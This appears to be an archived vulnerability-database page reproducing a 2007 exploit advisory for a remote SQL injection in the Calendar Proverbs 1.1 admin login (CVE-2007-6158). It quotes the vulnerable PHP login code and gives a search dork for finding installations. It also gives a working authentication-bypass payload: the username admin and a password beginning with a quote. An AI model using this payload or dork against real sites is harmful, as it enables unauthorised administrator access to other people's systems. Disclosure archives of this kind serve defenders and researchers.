Bug: Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection ( Ascii Version )

	WLB2.ORG
Full List

Bugs

Bogus

Tricks

Exploits

	CVEMAP.ORG
Full List

Vendors

Products

	Tools
CWE Dictionary

Dorks List

cIFrex

	Search
Bugtraq

CVEMAP

CVE Id

CWE Id

	RSS
Full List

Bugs

Exploits

Dorks

	Information
Add note

About



	Submit
To add a note, use this form or send email to submit@cxsec.org


	Social

Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection

Published	Credit	Risk
2007.11.29	JosS	Medium

CWE	CVE	Local	Remote
CWE-89	CVE-2007-6158	No	Yes

CVSS Base Score	Impact Subscore		Exploitability Subscore
7.5/10	6.4/10		10/10

Exploit range	Attack complexity	Authentication
Remote	Low	No required
Confidentiality impact	Integrity impact	Availability impact
Partial	Partial	Partial

# Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection

# Download:

# http://www.proverbs.biz/downloads/calendar.zip

# Bug found by JosS / Jose Luis Góngora Fernández

# Contact: sys-project[at]hotmail.com

# Spanish Hackers Team

# www.spanish-hackers.com

# /server irc.freenode.net /join #fullsecure

# d0rk: "Calendar powered by Proverbs"

# Stop lammer

[*] Vuln Code - caladmin.inc.php

$user = "";

$pass = "";

if (isset($_POST['loginname']) && $_POST['loginname'] != "")

$user = $_POST['loginname'];

if (isset($_POST['loginpass']) && $_POST['loginpass'] != "")

$pass = $_POST['loginpass'];

$loggedin = $this->loginuser($user, $pass);

[*] Simple Sql Injection In:

http://www.example.com/PATH/caladmin.php

http://www.example.com/events/caladmin.php

[*] Exploit:

Username: admin

Password: ' or

//---------------------------------------

Greetz To: All Hackers

JosS! / Jose Luis Góngora Fernández

ASCII VERSION

Ascii Version

Bug: Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection ( Ascii Version )

use this form